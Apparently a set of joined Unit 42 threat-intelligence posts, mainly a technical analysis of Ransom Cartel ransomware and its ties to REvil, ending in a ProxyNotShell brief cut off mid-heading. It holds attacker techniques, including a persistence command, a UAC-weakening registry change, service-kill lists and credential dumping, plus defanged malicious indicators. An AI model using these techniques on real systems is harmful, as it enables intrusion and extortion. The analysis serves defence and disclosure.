At Palo Alto Networks, we extract NODs from passive DNS and proactively detect potential cybercriminal activities among them. The new detector leverages various machine learning techniques to capture indicators for network abuses from WHOIS records, DNS traffic and lexical features. The system extends our visibility on emerging network threats and identifies new kinds of suspicious behaviors. As a result, it can discover about 2,323 potentially malicious domains as soon as they become active every day and protect our customers on average 4.79 days before the domains are confirmed to be involved in attacking campaigns.

Palo Alto Networks identifies the detected domains with the grayware category through our cloud-delivered security services for Next-Generation Firewalls, including URL Filtering and DNS Security. Our customers receive protections against damage from risky domains mentioned in this blog, as well as additional risky domains captured by our system.

Indicators of Compromise

C2 Domain

payment-downlaods[.]ga

Phishing Domains

asuna-sao[.]us
intesa-sanpaola[.]ml
zellesupport[.]info

Grayware Domains

bakbitionb[.]com
bsdybwo[.]tk
bwafduj[.]tk
createruler[.]com
jxc786[.]com
twtyowq[.]tk

SHA256

e9ad04ae0201307e061cdae350c392a6b4537876991b2c97857ea71086fa0496

 

Ransom Cartel Ransomware: A Possible Connection With REvil

Executive Summary

Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware. REvil ransomware disappeared just a couple of months before Ransom Cartel surfaced and just one month after 14 of its alleged members were arrested in Russia. When Ransom Cartel first appeared, it was unclear whether it was a rebrand of REvil or an unrelated threat actor who reused or mimicked REvil ransomware code.

In this report, we will provide our analysis of Ransom Cartel ransomware, as well as our assessment of the possible connections between REvil and Ransom Cartel ransomware.

Palo Alto Networks customers receive help with the detection and prevention of Ransom Cartel ransomware through the following products and services: Cortex XDR and Next-Generation Firewalls (including cloud-delivered security services such as WildFire).

If you think a cyber incident may have impacted you, the Unit 42 Incident Response team is available 24/7/365. You can also take preventative steps by requesting any of our cyber risk management services.

Indicators of compromise and Ransom Cartel-associated tactics, techniques and procedures (TTPs) can be found in the Ransom Cartel ATOM.

We updated this blog on Oct. 15 based on further analysis, additional evidence and discussion around the complexities of redirects from REvil’s dark web leak site. Updated sections include our History of the REvil Disappearance and the Ransom Cartel Overview.

Related Unit 42 Topics Ransomware, REvil

History of the REvil Disappearance

In October 2021, REvil operators went quiet. REvil’s dark web leak site  became unreachable. Around mid-April 2022, individual security researchers and cybersecurity media outlets reported a new development with REvil that could signify the gang’s return. REvil’s name-and-shame blogs at the dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd[.]onion and aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion domains started redirecting users to a new name-and-shame blog available at blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd[.]onion/Blog.

This redirect was documented in our post, “Understanding REvil,” in Bleeping Computer’s post on REvil’s TOR sites redirecting to a new ransomware operation and in a Twitter post from vx-underground

Later the same day, the redirect was removed (as noted by vx-underground). At the time, it was not possible to make a definitive attribution stating which group was behind the redirect because the new name-and-shame blog did not claim any name or affiliation.

At the start of the redirect, no breached organizations were listed on the site. Over time, the threat actors began adding records that had  appeared on “Happy Blog,” mostly from  late April to October 2021. They also included the old file-sharing links previously used by REvil as proof of compromise.

The newly established blog listed Tox Chat ID for communication with the ransomware operator. The blog hinted at its operators’ connection to REvil with the claim that the newer group offered “the same, yet improved software.” 

Unit 42 initially believed that this blog was linked to Ransom Cartel and that the “improved software” the threat actors referred to was a new Ransom Cartel variant. However, after further analysis and seeing more evidence, we believe it is also possible that the name-and-shame blog and Ransom Cartel are two separate operations. 

Whether this blog is operated by Ransom Cartel or a different group, what is clear is that, while REvil may have disappeared, its malicious influence has not. The operator of the newly established blog appears to have some type of access to REvil or ties to the group. At the same time, our analysis of Ransom Cartel samples (detailed in the sections below) provides strong evidence of ties to REvil as well. 

To read more about REvil, its disappearance and the redirect, please refer to our blog, Understanding REvil.

Ransom Cartel Overview

We first observed Ransom Cartel around mid-January 2022. Security researchers at MalwareHunterTeam believe the group to have been active since at least December 2021. They observed the first known Ransom Cartel activity and noticed several similarities and technical overlaps with REvil ransomware.

There are a number of theories about the origins of Ransom Cartel. One theory in the community suggests that Ransom Cartel could be the result of multiple groups merging. However, researchers at MalwareHunterTeam have put forward that one of the groups believed to have merged has denied any connection with Ransom Cartel. Additionally, Unit 42 has seen no connection between these groups and Ransom Cartel other than that many of them have connections to REvil. 

At this time, we believe that Ransom Cartel operators had access to earlier versions of REvil ransomware source code, but not some of the most recent developments (see our Ransom Cartel and REvil Code Comparison for more details).  This suggests there was a relationship between the groups at some point, though it may not have been recent.

Unit 42 has also observed Ransom Cartel group breaching organizations, with the first known victims observed by us around January 2022 in the U.S. and France. Ransom Cartel has attacked organizations in the following industries: education, manufacturing, and utilities and energy. Unit 42 incident responders have also assisted clients with response efforts in several Ransom Cartel cases.

Like many other ransomware gangs, Ransom Cartel leverages double extortion techniques. Unit 42 has observed the group taking an aggressive approach, threatening not only to publish stolen data to their leak site, but also to send it to the victim’s partners, competitors and the news in an effort to inflict reputational damage.

Ransom Cartel typically gains initial access to an environment via compromised credentials, which is one of the most common vectors for initial access for ransomware operators. This includes access credentials for external remote services, remote desktop protocol (RDP), secure shell protocol (SSH) and virtual private networks (VPNs). These credentials are widely available in the cyber underground and offer threat actors a reliable means to gain access to victims' corporate networks.

These credentials can also be obtained through the work of ransomware operators themselves or by purchasing them from an initial access broker.

Initial access brokers are actors who offer to sell compromised network access. Their motivation is not to carry out cyberattacks themselves but rather to sell the access to other threat actors. Due to the profitability of ransomware, these brokers likely have working relationships with RaaS groups based on the amount they are willing to pay.

Unit 42 has seen evidence that Ransom Cartel has relied on this type of service to gain initial access for ransomware deployment.

Unit 42 has also observed Ransom Cartel encrypting both Windows and Linux VMWare ESXi servers in attacks on corporate networks.

Tactics, Techniques and Procedures Observed During Ransom Cartel Attacks

Unit 42 observed a Ransom Cartel threat actor using a tool called DonPAPI, which has not been observed in past incidents. This tool can locate and retrieve Windows Data Protection API (DPAPI) protected credentials, which is known as DPAPI dumping.

DonPAPI is used to search machines for certain files known to be DPAPI blobs, including Wi-Fi keys, RDP passwords, credentials saved in web browsers, etc. To avoid the risk of detection by antivirus (AVs) or endpoint detection and response (EDR), the tool downloads the files and decrypts them locally. To compromise Linux ESXi devices, Ransom Cartel uses DonPAPI to harvest credentials stored in web browsers used to authenticate to the vCenter web interface.

We also observed the threat actor using additional tools, including LaZagne to recover credentials stored locally and Mimikatz to steal credentials from host memory.

In order to establish persistent access to Linux ESXi devices, the threat actor enables SSH after authenticating to vCenter. The threat actor will create new accounts and sets the account’s user identifier (UID) to zero. For Unix/Linux users, a UID=0 is root. This means any security checks are bypassed.

The threat actor was observed downloading and using a cracked version of a legitimate tool called PDQ Inventory, which is a legitimate system management solution that IT administrators use to scan their network and collect hardware, software and Windows configuration data. Ransom Cartel used this as a remote access tool to establish an interactive command and control channel and to scan the compromised network.

Once a VMware ESXi server is compromised, the threat actor launches the encryptor, which will automatically enumerate the running virtual machines (VMs) and shut them down using the esxcli command. Terminating the VM processes ensures that the ransomware can successfully encrypt VMware-related files.

During encryption, Ransom Cartel specifically seeks out files with the following file extensions: .log, .vmdk, .vmem, .vswp and .vmsn. These extensions are associated with ESXi snapshots, log files, swap files, paging files and virtual disks. Post-encryption, the following file extensions have been observed: .zmi5z, .nwixz, .ext, .zje2m, .5vm8t and .m4tzt.

Ransom Notes

Unit 42 has observed two different versions of ransom notes sent by Ransom Cartel. The first note was first observed around January 2022, and the other one first appeared in August 2022. The second version appeared to be completely rewritten, as shown in Figure 1.

Side by side comparison of two Ransom Cartel notes. The note on the left, first observed January 2022, and includes the following sections: What's Happen, What Guarantee, How to get access on website? A section at the bottom titled "Danger" warns against attempting to restore data. The note on the left, first observed in August 2022, is longer and includes the following sections: What's going on?, What are the guarantees?, How to get access on website? A section at the bottom titled "Attention" warns against trying to restore data yourself. The note warns about involving third parties throughout.
Figure 1. Ransom Cartel ransom notes. The note on the left was first observed in January 2022; the note on the right was first observed in August 2022.

It's interesting to note that the structure of the first ransom note used by Ransom Cartel shares similarities with a ransom note sent by REvil, as shown in Figure 2. In addition to the use of similar wording, both notes employed the same format of a 16-byte hexadecimal string for the UID.

The structure of a ransom note sent by Ransom Cartel (shown on the left) shares similarities with a ransom note sent by REvil (shown on the right). In addition to similar wording and section structures, both notes employed the same format of a 16-byte hexadecimal string for the UID.
Figure 2. Ransom Cartel ransom note shown on the left, compared to a ransom note sent by REvil shown on the right.

Ransom Cartel TOR Site

Ransom Cartel’s website for communication with victims was available via a TOR link provided in the ransom note. We’ve observed multiple TOR URLs belonging to Ransom Cartel, which likely indicates that they had been changing infrastructure and actively developing their website. A TOR private key is needed to access the website.

When the key is entered, the following page is loaded:

Ransom Cartel TOR site landing page, including a large purple "Authorization" button under the words "Ransom Cartel."
Figure 3. Ransom Cartel TOR site landing page.

Upon entering the TOR site through the Authorization button, a screen requesting input of the details included in the ransom note is requested.

Once the user clicks the authorization button on the landing page, this page is shown. Under the header "Authorization," it requests ID and key and offers options to log in or cancel.
Figure 4. Ransom Cartel website, requesting the ID and key provided in the ransom note.

Once authorization is completed on the TOR site, the page shown in Figure 5 appears. The site includes details such as ransom demand, in both US dollars and bitcoin, and the Bitcoin wallet address.

The Ransom Cartel TOR site after login includes sections titled "Information," "Chat Support" and "Trial decrypt: Limit 3." A dashboard includes explanations of the threat actors' desired process as well as info on ransom status, time to pay and currency demanded. The threat actors' Bitcoin wallet is also shown.
Figure 5. Ransom Cartel TOR site.

Technical Details

Two Ransom Cartel samples were used during this analysis:

File one SHA256: 55e4d509de5b0f1ea888ff87eb0d190c328a559d7cc5653c46947e57c0f01ec5
File two SHA256: 2411a74b343bbe51b2243985d5edaaabe2ba70e0c923305353037d1f442a91f5

Both of the samples contained three total exports:

Rathbuige
ServiceMain
SvchostPushServiceGlobals

The samples also contain a DllEntryPoint, should the DLL be executed without specifying an export. The DllEntryPoint leads to a function that iterates over a call to the Curve25519 Donna algorithm 24 times. Once the iteration ends, the sample will query the system metrics, specifically for the SM_CLEANBOOT value. If this value is anything other than 0, the ransomware will proceed to spawn another instance of itself via rundll32.exe, specifying the Rathbuige export.

SM_CLEANBOOT Values Description
0 Normal Boot
1 Fail-Safe Boot
2 Fail-Safe with Network Boot

Table 1. SM_CLEANBOOT values.

The Rathbuige export starts by creating the following mutex:

Global\\266ee996-e1ac-4eaa-9bdb-0b639d41b32d

Once the mutex is created, the sample begins to decrypt and parse its embedded configuration. The configuration is stored as a base64-encoded blob, whereby the first 16 bytes of the base64-encoded blob is the RC4 key used for decrypting the rest of the blob once it has been decoded.

Ransom Cartel encrypted configuration. Once the mutex is created, the sample begins to decrypt and parse its embedded configuration.
Figure 6. Ransom Cartel encrypted configuration.

Once decrypted, the configuration is stored in JSON format and consists of information such as encrypted file extension, the threat actors' public Curve25519-donna key, a base64-encoded ransom note, and a list of processes and services to terminate prior to encryption.

Once decrypted, the configuration is stored in JSON format as shown in this example and consists of information such as encrypted file extension, the threat actors' public Curve25519-donna key, a base64-encoded ransom note, and a list of processes and services to terminate prior to encryption.
Figure 7. Example of decrypted Ransom Cartel configuration.

A breakdown of the keys and their values within the configuration can be seen in Table 2.

Configuration Key Value
pk Attacker public key
dbg Debug mode
wht Allow listed items

  • Folders to avoid
  • Files to avoid
  • Extensions to avoid
prc Processes to terminate
svc Services to terminate
nname Name of ransom note file
nbody Ransom note content
ext Encrypted file extension

Table 2. Configuration structure.

dbsnmp raw_agent_svc onenote steam
VeeamNFSSvc synctime infopath msaccess
tbirdconfig mspub ocomm excel
EnterpriseClient ocssd agntsvc winword
ocautoupds thebat sql bedbh
dbeng50 powerpnt wordpad xfssvccon
VeeamTransportSvc CagService bengien visio
outlook DellSystemDetect encsvc benetns
pvlsvr isqlplussvc VeeamDeploymentSvc vsnapvss
sqbcoreservice firefox mydesktopservice oracle
mydesktopqos beserver thunderbird vxmon

Table 3. Targeted process list.

BackupExecVSSProvider BackupExecManagementService AcronisAgent
veeam VeeamDeploymentService ARSM
BackupExecAgentAccelerator MSExchange$ PDVFSService
MSSQL$ VeeamTransportSvc memtas
MSExchange vss stc_raw_agent
BackupExecDiveciMediaService CAARCUpdateSvc mepocs
svc$ WSBExchange sophos
VSNAPVSS MVarmor64 MSSQL
sql BackupExecRPCService backup
MVArmor BackupExecAgentBrowser VeeamNFSSvc
BackupExecJobEngine CASAD2DWebSvc bedbg
AcrSch2Svc

Table 4. Targeted service list.

mod cpl ps1
cab com ani
diagcab adv themepack
shs sys rom
cur ldf msu
mpa spl msi
msc wpx 386
diagcfg lock prf
deskthemepack bin ico
diagpkg nomedia idx
ics hlp msp
msstyles key cmd
scr exe drv
hta nls dll
lnk icns ocx
theme bat icl
rtp

Table 5. Avoided extensions.

Following decryption of the configuration, certain system information is gathered, including the username, computer name, domain name, locale and product name. This information is then formatted into the following JSON structure:

{"ver":%d,"pk":"%s","uid":"%s","sk":"%s","unm":"%s","net":"%s","grp":"%s","lng":"%s","bro":%s,"os":"%s","bit":%d,"dsk":"%s","ext":"%s"}

Table 6 describes the purpose of each key within the structure.

Key Value
ver Version of the ransomware, hardcoded. In both samples set to 0x65 (101)
pk Public key found within the configuration
uid Unique identifier calculated via CRC-32 hashing certain machine information
sk Encoded session secret
unm Username
net Computer name
grp Computer domain
lng Computer locale
bro Does keyboard locale match any hardcoded locale value – true/false
os Product name
bit System architecture
dsk Disk information
ext Ransomware extension

Table 6. Hardcoded JSON format keys and values.

Once the gathered data has been formatted into the JSON structure, it is then encrypted using the same procedure that Ransom Cartel follows to generate session_secret blobs, which will be discussed shortly; put simply, it involves AES encryption, utilizing the SHA3 hash of a Curve25519 shared key for the AES key.

Once encrypted, it is written to the registry key SOFTWARE\\Google_Authenticator\\b52dKMhj, with the sample first attempting to write to the HKEY_LOCAL_MACHINE hive, before writing to HKEY_CURRENT_USER if the right permissions are not possessed. Once the data has been written to the registry, it is then base64-encoded and embedded within the ransom note, replacing the {KEY} placeholder.

Once the configuration has been parsed and stored within the registry, the command line provided to the ransomware is parsed. There are a total of five possible arguments, as shown in Table 7.

Argument Description
-nolan Instruct the sample not to attempt any form of network drive encryption
-nolocal Prevent the encryption of all local volumes
-path Target specific file path to encrypt
-silent Appears to instruct the ransomware to avoid terminating running processes and services, and it begins encrypting files immediately
-smode Causes the ransomware to use BCEdit in order to enable Safe Boot; check  out this article on REvil’s use of “Windows Safe Mode” encryption for a discussion about this particular technique.

Table 7. Ransom Cartel accepted arguments.

With that, let’s move on to analyzing the session secret generation procedure.

Ransom Cartel first checks to see if the registry already contains previously generated values; if so, it will read those values into memory. Otherwise, it will generate a total of two session secrets at runtime, with each secret containing 88 bytes of data.

First, a public and private key pair will be generated using the code from this Curve25519 repository (session_public_1 and session_private_1). When generating the first session secret, another session key pair is generated, (session_public_2 and session_private_2) and session_private_2 is paired with attacker_cfg_public (the public key embedded within the configuration) to generate a shared key. This shared key is then hashed with the SHA3 hashing algorithm. The resulting hash is used as an AES key with a random 16-byte initialization vector (IV) for encrypting a data blob consisting of four null bytes followed by session_private_1.

Session secret generation procedure. The diagram maps out how session keys are generated and what names they receive, how secondary session keys are generated and what names they receive, how AES encrypt is used, how shared key hashes are generated and the names they receive, and how the various elements are put together to create session_secret_1.
Figure 8. Diagram of session secret generation procedure.

From there, the encrypted blob is hashed using CRC-32, and then appended with the values session_public_2, the AES IV, and the calculated CRC-32 hash. The resulting value is session_secret_1. The second generated session secret follows the exact same procedure; however, instead of using attacker_cfg_public, it utilizes an embedded public key (attacker_embedded_public_1) within the binary to generate the shared key.

Session secret generation procedure once decompiled. This shows how the encrypted blob is hashed using CRC-32, and then appended with the values session_public_2, the AES IV, and the calculated CRC-32 hash. At the end of the code snippet shown, the session_secret is returned.
Figure 9. Decompiled session secret generation procedure.

One final embedded public key (attacker_embedded_public_2) is used to encrypt the data formatted into the JSON structure described above.

This method of generating session secrets was documented by researchers at Amossys back in 2020; however, their analysis focused on an updated version of Sodinokibi/REvil ransomware, indicating a direct overlap between the REvil source code and the latest Ransom Cartel samples.

Once the session secrets have been generated, they are written to the registry, alongside session_public_1 and attacker_cfg_public.

Path Name Value
SOFTWARE\\Google_Authenticator\\ WRZfsL attacker_cfg_public
SOFTWARE\\Google_Authenticator\\ RB4y session_public_1
SOFTWARE\\Google_Authenticator\\ Kbcn0 session_secret_1
SOFTWARE\\Google_Authenticator\\ BSjHn session_secret_2

Table 8. Registry paths and values used by Ransom Cartel.

At this point, all the required information is gathered and generated so that file encryption can begin.

For each file, a unique file public and private key pair are generated (file_public_1 and file_private_1), once again using Curve25519 Donna. file_private_1 and session_public_1 are paired together to generate a shared key, which is hashed using SHA3. The generated hash is used as the encryption key for Salsa20 (a symmetric encryption algorithm), and a random eight-byte nonce is generated using CryptGenRandom. The CRC-32 hash of file_public_1 is calculated, and then four null bytes are encrypted using the generated Salsa20 matrix.

Certain elements of the above data are then retained and used as part of the encrypted file footer; each file footer is 232 bytes in length and is made up of the following:

  • session_secret_1 (88 bytes)
  • session_secret_2 (88 bytes)
  • file_public_1 (32 bytes)
  • salsa_nonce (eight bytes)
  • crc_file_public_1 (four bytes)
  • encryption_type (four bytes)
  • block_spacing (four bytes)
  • encrypted_null (four bytes)

Similarly to the session_secret generation, this structure is identical to that of the REvil samples analyzed by Amossys, further showing that there have been very few changes to the REvil source code when developing Ransom Cartel samples.

The code snippet shows the structure of the file encryption setup process, which is similar to REvil samples.
Figure 10. File encryption setup process.

Ransom Cartel and REvil Code Comparison

The Ransom Cartel samples analyzed revealed similarities with REvil ransomware.

The first notable similarity between Ransom Cartel and REvil is the structure of the configuration. Examining a sample of REvil from 2019 (SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3), the resemblance can be seen. However, the storage of the encrypted configuration is slightly different, opting to store the configuration in a separate section within the binary (.ycpc19), with an initial 32-byte RC4 key followed by the raw encrypted configuration, whereas with the Ransom Cartel samples, the configuration is stored within the .data section as a base64-encoded blob.

Code snippet showing REvil configuration storage, which differs slightly from Ransom Cartel encryption storage.
Figure 11. REvil configuration storage.

Once the REvil configuration has decrypted, it utilizes the same JSON format, but contains additional values such as pid, sub, fast, wipe and dmn. These values indicate additional functionality within the REvil sample, which could mean that either the Ransom Cartel developers removed certain functionality or they are building off of a much earlier version of REvil.

This shows how the REvil configuration once decrypted uses the same JSON format as Ransom Cartel, but contains additional values such as pid, sub, fast, wipe and dmn.
Figure 12. Decrypted REvil configuration.

As discussed previously, another major overlap is the code reuse across the two samples of Ransom Cartel. Both use an identical encryption scheme, generating multiple public/private key pairs, and creating session secrets using the same procedure found within REvil samples.

The REvil session secret generation function, shown in the code snippet, is identical to that of Ransom Cartel.
Figure 13. REvil session secret generation function.

Both use Salsa20 and Curve25519 for file encryption, and there are very few differences in the layout of the encryption routine besides the structure of the internal type structs.

REvil file encryption setup function, which has very few differences in the layout of the encryption routine as compared to Ransom Cartel.
Figure 14. REvil file encryption setup function.

A particularly interesting difference between the two malware families is that REvil opts to obfuscate their ransomware much more heavily than the Ransom Cartel group, utilizing string encryption, API hashing and more, while Ransom Cartel has almost no obfuscation outside of the configuration, hinting that the group may not possess the obfuscation engine used by REvil.

It is possible that the Ransom Cartel group is an offshoot of the original REvil threat actor group, where the individuals only possess the original source code of the REvil ransomware encryptor/decryptor, but do not have access to the obfuscation engine.

Ransom Cartel Tactics, Techniques and Procedures

Below is a list of TTPs observed being used by Ransom Cartel affiliates:

TTPs Notes
TA0001 Initial Access
T1078. Valid Accounts Uses legitimate VPN, RDP, Citrix or VNC credentials to maintain access to an environment.
T1133. External Remote Services Uses legitimate VPN or Citrix credentials to maintain access to an environment.
TA0002 Execution
T1072. Software Deployment Tools Deploys PDQ Inventory Scanner tool.
T1059.001. Command and Scripting Interpreter: PowerShell Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.
T1059.003 Command and Scripting Interpreter: Windows Command Shell Uses cmd.exe to execute commands.
TA0003 Persistence
T1003.008. OS Credential Dumping: /etc/passwd and /etc/shadow Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.
T1136.001. Create Account: Local Account Creates new users’ accounts.
T1098. Account Manipulation Adds newly created accounts to the administrators group to maintain elevated access.
T1547.001. Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder Adds registry run keys to achieve persistence. In some cases, we observed using the following command:
start cmd.exe /k runonce.exe /AlternateShellStartup
T1197. BITS Jobs Uses BITSAdmin to download and install payloads.
TA0004 Privilege Escalation
T1068. Exploitation for Privilege Escalation Exploits Print Nightmare vulnerability.
TA0005 Defense Evasion
T1222.002. File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification Uses the chmod +x command to grant executable permissions to the ransomware.
T1112. Modify Registry Modifies the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.
T1070.001 Indicator Removal on Host: Clear Windows Event Logs Uses wevtutil to clear the Windows event logs.
T1218.011. System Binary Proxy Execution: Rundll32 Uses Rundll32 to load and execute malicious DLL.
T1562.004. Impair Defenses: Disable or Modify System Firewall Deletes rules in the Windows Defender Firewall exception list related to AnyDesk 
T1070.004. Indicator Removal on Host: File Deletion Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe
T1070.003. Indicator Removal on Host: Clear Command History Clears Windows PowerShell and WitnessClientAdmin log file.
T1027. Obfuscated Files or Information Uses encoded PowerShell commands.
TA0006 Credential Access
T1003.001. OS Credential Dumping: LSASS Memory Uses Mimikatz to harvest credentials.
T1555.003. Credentials from Password Stores: Credentials from Web Browsers Compromises users’ saved passwords from browsers.
TA0007 Discovery
T1046. Network Service Discovery Uses tools such as PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability).
T1083. File and Directory Discovery Searches for specific files prior to encryption.
T1135. Network Share Discovery Enumerates remote open SMB network shares
T1087.001. Account Discovery: Local Account Accesses ntuser.dat and /etc/passwd to enumerate all accounts.
TA0008 Lateral Movement
T1021.004. Remote Services: SSH Uses Putty for remote access.
T1550.002. Use Alternate Authentication Material: Pass the Hash Dumps password hashes for use in pass the hash authentication attacks.
T1021.001. Remote Services: Remote Desktop Protocol Uses RDP for lateral movement.
TA0009 Collection
T1560.001. Archive Collected Data: Archive via Utility Uses 7-Zip to compress stolen data for exfiltration.
TA0010 Exfiltration
T1567.002. Exfiltration Over Web Service: Exfiltration to Cloud Storage Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync).
TA0011 Command and Control
T1219. Remote Access Software Uses AnyDesk to remotely connect and transfer files.
T1090.003. Proxy: Multi-hop Proxy Routes traffic over TOR and VPN servers to obfuscate their activities.
T1105. Ingress Tool Transfer Downloads and uploads files to and from the victim’s machine.
TA0040 Impact
T1486. Data Encrypted for Impact Encrypts system data and adds the random extension to encrypted files. The following extensions have been observed (.zmi5z, .nwixz, .ext, .zje2m, .5vm8t, .m4tzt).

Table 9. Tactics, techniques and procedures for Ransom Cartel activity.

Malware, Tools and Exploits Used

Execution Credential Access Discovery Privilege Escalation Lateral Movement Command and Control Exfiltration
PowerShell

Windows command shell

Mimikatz

LaZagne

DonPAPI
PDQ Inventory scanner

Advanced Port Scanner

netscan.exe
Print Nightmare Putty AnyDesk

Cobalt Strike 
Rclone

Table 10. Malware, tools and exploits used.

 

Conclusion

Ransom Cartel is one of many ransomware families that surfaced during 2021. While Ransom Cartel uses double extortion and some of the same TTPs we often observe during ransomware attacks, this type of ransomware uses less common tools – DonPAPI for example – that we haven’t observed in any other ransomware attacks.

Based on the fact that the Ransom Cartel operators clearly have access to the original REvil ransomware source code, yet likely do not possess the obfuscation engine used to encrypt strings and hide API calls, we speculate that the operators of Ransom Cartel had a relationship with the REvil group at one point, before starting their own operation.

Due to the high-profile nature of some organizations targeted by Ransom Cartel and steady stream of Ransom Cartel cases identified by Unit 42, the operator and/or affiliates behind the ransomware likely will continue to attack and extort organizations.

Palo Alto Networks customers receive help with detection and prevention of Ransom Cartel ransomware in the following ways:

  • WildFire: All known samples are identified as malware.
  • Cortex XDR:
    • Identifies indicators associated with Ransom Cartel.
    • Anti-Ransomware Module to detect Ransom Cartel encryption behaviors on Windows.
    • Local Analysis detection for Ransom Cartel binaries on Windows.
  • Next-Generation Firewalls: DNS Signatures detect the known command and control domains, which are also categorized as malware in Advanced URL Filtering.

If you think you may have been compromised or have an urgent matter, you can get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Ransom Cartel Samples

9935DA29F3E4E503E4A4712379CCD9963A730CCC304C2FEC31E8276DB35E82E8
BF93B029CCA0DE4B6F32E98AEEBD8FD690964816978A0EB13A085A80D4B6BF4E
55e4d509de5b0f1ea888ff87eb0d190c328a559d7cc5653c46947e57c0f01ec5
2411a74b343bbe51b2243985d5edaaabe2ba70e0c923305353037d1f442a91f5

Network-based IoCs

185.239.222[.]240 TOR Exit Node
108.62.103[.]193 TOR Exit Node
185.129.62[.]62 TOR Exit Node
185.143.223[.]13 Bulletproof hosting server
185.253.163[.]23 PIA VPN exit node

Indicators of compromise and Ransom Cartel-associated TTPs can be found in the Ransom Cartel ATOM.

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Updated Oct. 15, 2002, at 11:15 a.m. PT.

Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)

Executive Summary

In early August, GTSC discovered a new Microsoft Exchange zero-day remote code execution (RCE) that was very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).

The exploit was discovered in the wild in what appeared to be a SOC investigation into suspicious activity of one of GTSC’s customers. Once they determined the scope of the vulnerabilities, GTSC reported the vulnerability to the Zero-day Initiative (ZDI) to enable further coordination with Microsoft. The vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated with severities of critical and important respectively. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

The exploit does require authentication; however, the authentication required is that of a standard user and, based on how easy it is to collect user credentials these days, this is not a high bar to overcome. Microsoft has yet to release a patch for these vulnerabilities. In the meantime, they provided mitigations in a blog responding to GTSC’s disclosure of these vulnerabilities.

Palo Alto Networks customers receive protections from and mitigations for ProxyNotShell in the following ways:

  • Next-Generation Firewalls or Prisma Access with a Threat Prevention security subscription can block sessions related to CVE-2022-41040.
  • A Cortex XSOAR response pack and playbook can automate the mitigation process.
  • Cortex Xpanse can help identify and detect Microsoft Exchange servers that may be a part of your attack surface.
  • Cortex XDR will report related exploitation attempts.
  • XQL queries provided below can be used with Cortex XDR to help track attempts to exploit these CVEs.
  • Malicious URLs and IPs have been added to Advanced URL Filtering.
  • The Unit 42 Incident Response team can provide personalized assistance.

For more details, please see the conclusion.

Vulnerabilities Discussed CVE-2022-41040, CVE-2022-41082

Details of the Vulnerabilities

GTSC’s SOC discovered the following URL requests in a customer’s Microsoft Internet Information Services (IIS) logs:

The URL requests shown were discovered in a GTSC customer's Microsoft Internet Information Services logs and appear to be identical to ProxyShell requests seen last year.

The URL requests appear to be identical to the ProxyShell requests seen last year. Compare the above request with the following excerpt from Mandiant’s blog reporting on the discovery of ProxyShell last year, and you’d think this must be an unpatched server exploited by ProxyShell.

Excerpt from Mandiant's blog reporting on the discovery of ProxyShell last year. Note the similarity between the requests shown and what was seen with ProxyNotShell.

GTSC reviewed the Exchange server version and confirmed the Exchange servers were up to date and the vulnerabilities were indeed new zero days. GTSC also confirmed the attackers were able to get PowerShell execution during the attack. This also resembles ProxyShell. Once attackers gained access to the server, they installed webshells to obtain persistent access to the network. GTSC reported the vulnerability to the Zero-day Initiative (ZDI) to enable further coordination with Microsoft. The vulnerabilities were assigned CVE-2022-41040 and CVE-2022-41082 and rated with severities of critical and important respectively. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker.

Please refer to GTSC’s excellent blog for details on the webshells, malware analysis, indicators of compromise (IoCs) and commands discovered during their investigation. Microsoft has stated that the vulnerabilities affect Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019. They also state that “Exchange Online has detections and mitigations to protect customers. As always, Microsoft is monitoring these detections for malicious activity and we’ll respond accordingly if necessary to protect customers.”

Current Scope of the Attack

It does appear there are multiple victims of this attack. However, from what has been publicly reported, the attacks still seem to remain isolated. GTSC stated in their blog, “GTSC's direct incident response process recorded more than one organization being the victims of an attack campaign exploiting this 0-day vulnerability.”

Microsoft, in a blog response to GTSC’s, stated “MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks.”

Both GTSC and Microsoft’s observed attacks used the China Chopper webshell and Microsoft’s MSTIC attributes the attacks, with medium confidence, to one attack group. Although the attacks still appear to be isolated, based on the history of ProxyShell and the difficulty of patching Exchange servers, we believe this vulnerability will garner widespread attention from threat groups. Therefore, we expect working exploits and proofs of concept (PoCs) will soon be available to aid in the exploitation of these vulnerabilities. That being said, Unit 42 has not yet seen any evidence of attempted exploitation within our customer telemetry.

Interim Guidance

